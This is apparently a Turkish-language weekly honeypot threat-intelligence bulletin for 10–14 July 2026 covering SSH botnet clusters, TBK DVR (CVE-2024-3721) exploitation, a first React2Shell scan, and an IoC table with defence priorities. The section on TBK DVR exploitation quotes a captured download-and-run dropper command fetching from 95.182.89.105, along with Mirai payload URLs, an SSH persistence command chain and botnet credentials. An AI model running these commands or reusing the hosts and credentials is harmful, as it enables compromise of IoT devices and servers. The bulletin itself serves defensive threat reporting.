← Tüm Yazılar
IOC RAPORUMEDIUM14 Temmuz 2026 · 9 dk okuma

Bülten 10–14 Temmuz: React2Shell Tarayıcısı Feed'e Girdi, SSH Playbook'u Banatsync Üçlüsüne Taşındı, Kısa Ama Sert Dalga

Haftalık pencerede feed'e 1.397 yeni IoC girdi ve 11 Temmuz'da tek günde 783K event ile geçen haftanın sakinliği kısa sürdü. 2025 tarihli React Server Components açığı (CVE-2025-55182) ilk kez tarama listelerimizde göründü, SSH persistence playbook'u senkron bir Banatsync üçlüsüne taşındı ve SOSTREA/TBK istismarı yavaşladı ama path marker'ı sabit kaldı. Geçen bültenin öngörüleri yine test edildi.

Analiz: Erdem Özyurt · SiberKale Tellal

İçindekiler 12
📅Veri dönemi: 10 – 14 Temmuz 2026 · IoC veritabanı + ham sensör logları (tam örtüşme) · OPSEC-filtreli

Yönetici Özeti

1.397yeni IoC (10–13 Tem)
783K11 Temmuz zirve event
854CVE-2024-3721 imza
63.608toplam IoC

3–9 Temmuz bülteni “aylardır en sakin hafta” notuyla kapanmış, aktörlerin altyapıyı haftalık ritimde eskittiğini ama davranış imzalarının sabit kaldığını söylemişti. Bu kısa pencere iki tarafı da doğruladı: sakinlik 11 Temmuz’da tek günlük bir dalgayla bozuldu, ama arkadaki komut zincirleri ve marker’lar aynen yerinde kaldı. Dönemin dört hikâyesi:

  1. Kısa ama sert dalga: Günlük ham hacim geçen haftanın ~254K taban çizgisinden 11 Temmuz’da 783K event’e sıçradı (pencerenin %54’ü tek güne sığdı), sonra 12–13 Temmuz’da ~80–107K’ya geri düştü. Dalga geldi, hedef listesini çıkardı, çekildi.
  2. React2Shell radara girdi: 2025 tarihli React Server Components açığı (CVE-2025-55182) feed’imizde ilk kez göründü. Tek kaynak 45.198.224.244, 12 Temmuz’da iki saniyeye sığan bir patlamayla 8080 portunu yokladı. Sayı küçük ama sinyal yeni: en güncel web-framework açıkları artık tarama sepetinde.
  3. SSH playbook’u Banatsync üçlüsüne taşındı: Geçen haftanın senkron ikilisinden 45.153.34.235 sustu; yerini 141.11.88.238 / .240 / .251 (Banatsync Srl) üçlüsü aldı, üçü birden ~10,7–11,1K Cowrie event ile neredeyse eşit yük üretti. Komut zinciri ve credential parmak izi Nisan’dan beri değişmedi.
  4. SOSTREA yavaşladı, marker sabit: TBK DVR istismarı (CVE-2024-3721) geçen haftanın 2.087 imzasından 854’e indi, ama ___S_O_S_T_R_E_A_MAX___ marker’ı ve bbc dropper’ı aynı yerde. Bu kez rotasyon durdu; teslimat cephaneliğine nz multi-arch ve cacti temalı payload eklendi.
ℹ️ Veri Notu

Bu bülten 10–14 Temmuz penceresini kapsar; ağırlık 10–13 Temmuz tam günlerindedir (14 Temmuz sensör retention'ında henüz tamamlanmamıştı, sayımlara dahil edilmedi). Pencerenin tamamı hem IoC veritabanı hem ham sensör retention'ı içinde kaldığı için trend ve davranış verisi tek katmandır. İç/yönetim trafiği, honeypot overlay'ının kendi iç iletişimi ve bilinen operasyonel kaynaklar tüm tablo ve listelerden çıkarılmıştır.


1. Kısa Ama Sert Dalga: Sakinlik 11 Temmuz’da Bozuldu

Pencere toplamı 1,45M event ve 23.615 benzersiz kaynak IP (4 gün). Geçen bültenin 7 günlük penceresi ~254K/gün ortalamayla “en sakin hafta” olmuştu; bu kısa pencerede 11 Temmuz tek başına 783K event üretti ve o sakinliği bir günde geri aldı. Sonra dalga çekildi:

GünEventYeni IoC
10 Temmuz475.780453
11 Temmuz782.676554
12 Temmuz81.271195
13 Temmuz107.300195

Profil klasik “keşif dalgası”: 10–11 Temmuz’da geniş yüzeyli tarama, hedef listesi çıkarma, ardından hızlı geri çekilme. 12–13 Temmuz taban çizgisine dönüş, ama bu iki gün de daha nokta atışı istismar (TBK DVR, React2Shell) barındırdı. Yani hafta iki fazlıydı: önce hacim, sonra hassas dokunuş.

Yeni IoC’lerin ülke dağılımında Türkiye yine ilk sırada ve bu kez farkı açtı:

ÜlkeYeni IoC (10–13 Tem)
TR638
US174
CN110
GB93
BE85
NL46

TR’nin 638 yeni IoC’si toplam haftalık girişin %46’sı. Ama bu, saldırıların Türkiye’den yönetildiği anlamına gelmiyor: bu IP’ler Türk bulut sağlayıcılarında kiralanmış tarama node’ları. Kaynak ASN dağılımı bunu netleştiriyor.


2. TR Hosting Dalgası REXE ve HostLAB’a Kaydı

Geçen bülten, TR trafiğinin tek bir ASN’de (AS214041 Dokunmatik Ekran) yoğunlaştığını “izlenmesi gereken yeni desen” olarak not etmişti. Bu hafta tablo yeniden çok-operatörlü hâle döndü, ama ağırlık merkezi iki Türk hosting’e kaydı:

AS HolderYeni IoC
REXE Teknoloji A.Ş.254
HostLAB Bilişim Teknolojileri A.Ş.213
Google LLC (GCP)105
KuzeyDC Mailbox Internet70
DigitalOcean64
Rackdog LLC51

REXE ve HostLAB tek başına TR yeni IoC’lerinin üçte ikisini üretti. Dokunmatik Ekran ASN’i sahneden çekilmedi ama liderliği bıraktı: ham sensör tarafında o bloktan 213.146.165.46 hâlâ dönemin en yoğun ikinci kaynağıydı (13.476 event, 443/80 web taraması). Türk hosting ekosistemi kötüye kullanım açısından “tek yoğun ASN” fazından geri çıkıp yeniden dağıldı; savunma tarafında bu, tek ASN blok yerine düzenli güncellenen bir TR-hosting prefix listesi gerektiriyor.


3. SSH Playbook’u Banatsync Üçlüsüne Taşındı

Geçen bültenin senkron SSH ikilisi (45.153.34.235 + 91.92.40.14) bu hafta ayrıştı: 45.153.34.235 tamamen sustu (0 event), 91.92.40.14 yalnızca 10 Temmuz’da tek günlük bir yığınla (10.941 event) göründü. Playbook’u devralan ise yeni bir senkron küme oldu:

IPCowrie eventNot
141.11.88.23811.094Banatsync Srl (US), port 22
141.11.88.24010.711Aynı /24, senkron yük
141.11.88.25110.649Aynı /24, senkron yük
45.153.34.7110.633TechTies Inc. (NL), komşu operasyon
45.153.34.18610.625Aynı /24, senkron yük

Üç Banatsync IP’sinin event sayılarının 10,6–11,1K bandında kümelenmesi (ve TechTies çiftinin de aynı banda oturması) tesadüf değil: aynı görev tanımının aynı anda beş instance’a dağıtıldığı senkron küme deseni, geçen haftanın ikili yapısının genişlemiş hâli. Ayrıca lider tek kaynak 172.86.122.53 (US, RouterHosting) tek başına 14.508 event ile SSH gövdesinin başını çekti.

Login sonrası komut zinciri Nisan’dan beri kelimesi kelimesine aynı; tüm komutlar 199–203 hit bandında, yani tek scriptin fingerprint sekansı:

Komut / davranışHit
cd ~; chattr -ia .ssh; lockr -ia .ssh201
uname -a / uname -m200–203
cat /proc/cpuinfo ... (kapasite keşfi)200–201
crontab -l200
free -m, df -h, top, w, which ls199–200

Credential tarafında klasikler başta (root 5.634, admin 1.099; parolada 123456, 123, password), ama asıl imza yine botnet parmak izi çifti:

CredentialHitTür
345gs5662d34179kullanıcı adı + parola (aynı değer iki alanda)
3245gs5662d34177parola varyantı

Bu çift tek başına yüksek doğruluklu bir IOC; geçen bültende işaret ettiğimiz gibi hâlâ aktif. SSH client sürümlerinde ise insan yok: Go %52,8 ve libssh %40,2 birlikte trafiğin %93’ü, PuTTY yalnızca %1,4. Tümü otomasyon.


4. SOSTREA Yavaşladı Ama Marker Sabit, Cephanelik Genişledi

TBK DVR ailesinin istismarı bu hafta hız kesti: ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection (CVE-2024-3721) imzası geçen haftanın 2.087’sinden 854 tetiklenmeye indi, ağırlık 12 Temmuz’da. İki aktör imzanın tamamını taşıyor:

IPCVE-2024-3721 hitBağlam
45.153.34.204492Nisan’dan beri aktif, hem tarayıcı hem bbc payload sunucusu
45.139.122.80345Geçen haftanın ana aktörü, süreklilik

Değişmeyen ise operasyonun kalbi: ___S_O_S_T_R_E_A_MAX___ marker’ı Tanner’da 848 kez, hep aynı device.rsp injection deseniyle görüldü. 45.153.34.204’ten gelen payload zinciri birebir aynı kaldı:

cd /tmp; rm bbc; wget http://95.182.89.105/bbc; chmod 777 bbc; ./bbc

Geçen hafta “host rotasyonu artık haftalık” demiştik; bu hafta 95.182.89.105 bbc hostu yerinde durdu, yani rotasyon bir tur atladı. Buna karşılık teslimat cephaneliği genişledi: Cowrie’de yakalanan indirmeler yeni iki dağıtım hattı gösterdi:

PayloadİndirmeBağlam
41.216.189.92/nz/nz.{x86,mips,arc,i468} + nz.sh11Multi-arch Mirai binary seti (mimari başına ayrı)
103.56.149.224/cacti/ns{1,3}.jpg9.jpg uzantılı gizlenmiş payload (SHA 80c3fe2a…)

Multi-arch nz seti, farklı CPU mimarilerindeki IoT cihazlarını körlemesine hedefleyen klasik Mirai dağıtım yöntemi; cacti temalı .jpg payload ise web tarafında masum görsel gibi görünüp indir-çalıştır zincirine giren bir gizleme denemesi. IP listeleri haftalık eskiyor, ama tespit noktası sabit: marker, device.rsp deseni ve /tmp içindeki indir-çalıştır zinciri.


5. React2Shell: 2025 CVE’si İlk Kez Radarda

Haftanın en yeni sinyali küçük ama önemli. ET WEB_SPECIFIC_APPS React Server Components React2Shell Unsafe Flight Protocol Property Access (CVE-2025-55182) imzası feed geçmişimizde ilk kez tetiklendi: tek kaynak 45.198.224.244 (VPSVAULT.HOST, US), 12 Temmuz 12:01’de iki saniyeye sığan 25 istekle 8080 portunu taradı.

CVE-2025-55182, Next.js/React Server Actions katmanındaki güvensiz deserialization üzerinden uzaktan kod çalıştırmaya açılan taze bir zincir (React2Shell). Yani en son çıkan web-framework açıkları, yayımlanmalarından kısa süre sonra kitlesel tarama sepetlerine giriyor.

🚨 Kritik Okuma: Yeni CVE'ler Artık Haftalar İçinde Taranıyor

Bu tarama honeypot'un IDS katmanına takıldı; emülatör Server Action içeriğini tam karşılamadığı için exploit payload'ının sonraki adımları görülmedi. Yine de kayıt net: 2025 tarihli bir framework açığı feed'e girdi. İnternete açık her Next.js uygulaması Next.js ≥ 15.2.5 / 14.x son yama seviyesinde olmalı; Server Actions endpoint'lerine (/api, _next/server) gelen Next-Action başlıklı POST istekleri ve multipart/form-data gövdeleri WAF/log tarafında izlenmeli. Aynı gün ThinkPHP RCE (20) ve PHP-CGI CVE-2024-4577 (20) imzaları da tetiklendi; eski ve yeni açıklar aynı tarama demetinde birlikte geliyor.


6. SMTP, MySQL ve Genel Yüzey

SMTP’de yeni dominant. Mailoney tarafında 2.791 event’in yarısına yakınını yeni bir kaynak taşıdı: 130.12.182.166 (1.356 event, %48,6) geçen bültende yoktu. Geçen haftanın işaret ettiğimiz 158.94.x bloğu ise tahmin edildiği gibi dönmeye devam etti: 158.94.211.49 594 event ile ikinci sırada, 158.94.211.32 de listede. IP değişiyor, komşuluk kalıyor.

MySQL/Dionaea sabit envanterci. 213.209.159.154 (TW, Feo Prest) 10.279 event ile 3306 portunda dört gün boyunca düzenli kaldı, 12 Temmuz’da 5.049 event’lik günlük yoğunlaşma yaptı. Geçen bültenin “sabırlı ve düzenli envanter taraması” profili aynen sürüyor.

Dış yüzey port dağılımı bu hafta web ağırlıklı bir dengeye oturdu:

PortEventBağlam
443444.432HTTPS probe
80441.052HTTP probe
22434.569SSH
330616.253MySQL
808015.524Alternatif web (geçen hafta liderdi, geriledi)
258.750SMTP

Diğer yüzey notları:

  • MikroTik API taraması bu hafta gelmedi: Geçen bülten 8728/tcp’ye haftalık ~25,8K probe raporlamıştı ve izlemeye almıştık. Bu pencerede 8728 ve 7844’e dışarıdan sıfır trafik geldi; her iki porttaki kayıtlar tamamen honeypot overlay’ının kendi iç iletişimi (OPSEC-filtreli çıkarıldı). Öngörü bu hafta gerçekleşmedi; portu kapalı tutma önerisi yine de geçerli.
  • KEYPLUG/Conficker imzası yine iç kaynak: Severity-1 imzalarının büyük kısmını oluşturan KEYPLUG/Downadup/Conficker-C P2P ailesi bu dönemde de honeypot overlay ağının kendi iç trafiğinden doğan yanlış pozitif çıktı; dış saldırgan sinyali değil, public sayımlardan çıkarıldı. Dışarıdan gelen gerçek severity-1’ler Suspicious Chmod (857) ve TBK DVR (854) etrafında toplanıyor.
  • 2.57.121.0/24 yeni SSH kümesi: Romanya UNMANAGED bloğundan 2.57.121.25 (1.519) ve 2.57.121.112 (1.210) dört gün boyunca dengeli SSH taraması yaptı. Geçen haftanın Romanya ikilisi (193.32.162.34/35) susmuştu; aynı ülkeden farklı bir blok ritmi devraldı.

7. Feed Göstergeleri

Metrik10 Temmuz14 TemmuzDeğişim
Toplam IoC62.21163.608+1.397 (%2,2)
Pencere IoC (10–13 Tem)1.397
Benzersiz ASN4.0154.047+32

Tüm zamanlar ülke sıralaması geçen haftanın tablosunu korudu; Çin üçüncülüğünü sağlamlaştırdı:

ÜlkeIoC (14 Temmuz)Not
US13.332Lider
TR9.4792. (değişmedi)
CN5.4683. (BR’nin önünde kaldı)
BR5.2514.

IoC Tablosu: 10 – 14 Temmuz Penceresi

IoCTürBağlamÖncelik
45.198.224.244IPReact2Shell CVE-2025-55182 tarayıcısı (feed’de ilk)high
45.153.34.204IPTBK DVR CVE-2024-3721 + bbc payload sunucusu, Nisan’dan beri aktifhigh
45.139.122.80IPSOSTREA/TBK ikinci aktörü, süreklilikhigh
95.182.89.105/bbcURLSOSTREA bbc dropper hostu (rotasyon bu hafta durdu)high
41.216.189.92/nz/nz.x86URLMulti-arch Mirai payload setihigh
103.56.149.224/cacti/ns3.jpgURL.jpg gizlenmiş payload (SHA 80c3fe2a…)medium
141.11.88.238 / .240 / .251IPBanatsync senkron SSH kümesi (playbook yeni taşıyıcısı)high
45.153.34.71 / .186IPTechTies senkron SSH kümesi (komşu operasyon)high
172.86.122.53IPDönemin lider SSH kaynağı (14,5K event)medium
213.146.165.46IPTR web tarama zirvesi (Dokunmatik Ekran ASN)medium
2.57.121.25 / 2.57.121.112IPRomanya UNMANAGED yeni SSH kümesimedium
213.209.159.154IPMySQL/Dionaea sabit envanter taramasımedium
130.12.182.166IPSMTP/Mailoney yeni dominant kaynakmedium
158.94.211.49IPSMTP bloğunun dönüşü (158.94.208.0/22)medium
345gs5662d34 / 3245gs5662d34CredentialSSH botnet parmak izi (kullanıcı + parola)medium
80c3fe2ae1062abf56456f52518bd670f9ec3917b7f85e152b347ac6b6faf880SHA-256cacti temalı .jpg payloadmedium
ET WEB_SPECIFIC_APPS React Server Components React2Shell (CVE-2025-55182)IDSTaze framework açığı taramasıhigh
ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection (CVE-2024-3721)IDSSOSTREA aktif istismarıhigh

IOC’lar savunma amaçlı paylaşılır. Haftanın dersi geçen haftayı tekrarlıyor: kaynak IP’ler değişiyor (senkron ikili → Banatsync üçlüsü, SMTP → yeni dominant, Romanya bloğu → yeni blok), davranış ve marker’lar değişmiyor.


Savunma Öncelikleri

  1. Taze framework açıkları (yeni): CVE-2025-55182 feed’e girdi. İnternete açık Next.js uygulamalarını ≥ 15.2.5 / 14.x son yamaya çekin; Server Actions endpoint’lerine gelen Next-Action başlıklı POST’ları ve olağandışı multipart/form-data gövdelerini alarma bağlayın. Yeni CVE’ler artık haftalar içinde toplu taranıyor, yama penceresi kısa.
  2. SSH post-auth korelasyonu (sahibi değişti): Başarılı login sonrası ilk 60 saniyede chattr/lockr .ssh, crontab, uname, cpuinfo zinciri en güvenilir imza. 345gs5662d34/3245gs5662d34 credential çiftini doğrudan IOC olarak ekleyin.
  3. Prefix bazlı flood savunması: Senkron küme deseni bu hafta Banatsync 141.11.88.0/24 ve TechTies 45.153.34.0/24 üzerine yayıldı; Romanya 2.57.121.0/24 de aynı ritimde. Rate-limit ve skorlamayı IP değil en az /24 prefix bazında uygulayın.
  4. TBK DVR / IoT yüzeyi: İstismar yavaşladı ama durmadı. Tespiti device.rsp injection deseni ve ___S_O_S_T_R_E_A_MAX___ marker’ı üzerinden kurun; payload host listeleri (95.182.89.105, 41.216.189.92, 103.56.149.224) haftalık eskiyor, egress’te /tmp indir-çalıştır zincirini izleyin.
  5. SMTP komşuluk izleme: 158.94.208.0/22 yine döndü, yanına yeni dominant 130.12.182.166 eklendi. RCPT TO başarısızlıklarını tekil IP yerine prefix bazında gruplamaya devam edin.

Sonuç

Bu kısa pencere, geçen bültenin ana tezini bir kez daha kanıtladı: aktörler altyapıyı hızla eskitiyor, davranışı hiç değiştirmiyor. Senkron SSH kümesi üçüncü kez el değiştirdi (Romanya ikilisi → TechTies ikilisi → Banatsync üçlüsü), SMTP yeni bir dominant kaynağa geçti, SOSTREA cephaneliğine iki yeni dağıtım hattı ekledi. Ama komut zinciri, marker, credential çifti ve senkron-küme deseni aylardır sabit.

Yeni olan tek şey React2Shell: 2025 tarihli bir açığın feed’e girmesi, savunmanın “eski CVE’ler + yeni CVE’ler aynı tarama demetinde” gerçeğiyle yüzleşmesi gerektiğini gösteriyor. IP listesi tabanlı savunmanın yarı ömrü haftayla ölçülürken, davranış imzalarına ve hızlı yama disiplinine yapılan yatırım değerini koruyor.


Metodoloji ve Lisans

Bu rapor 10 – 14 Temmuz 2026 arası Tellal IoC veritabanı kayıtları ile aynı dönemin ham honeypot loglarının OPSEC-filtreli analiziyle hazırlandı. Dahili IP’ler, yönetim trafiği, honeypot overlay’ının iç iletişimi, RFC1918/CGNAT ve bilinen operasyonel kaynaklar public yayından çıkarılmıştır. Pencerenin tamamı sensör retention’ı içinde kaldığı için trend ve davranış verisi tek katmandır.

Bu bültenlerin dayandığı honeypot ağının ne olduğunu, nasıl kurulduğunu ve ne yakaladığını merak ediyorsanız: Honeypot (Bal Küpü) Nedir? Türleri, Kurulumu ve Sahadan Gerçek Veriler.

Lisans: CC BY 4.0 · Atıf yapılarak serbestçe kullanılabilir. IOC’lar CC0 lisansı altında serbesttir. SiberKale Tellal · Threat Intelligence Feed · tellal.net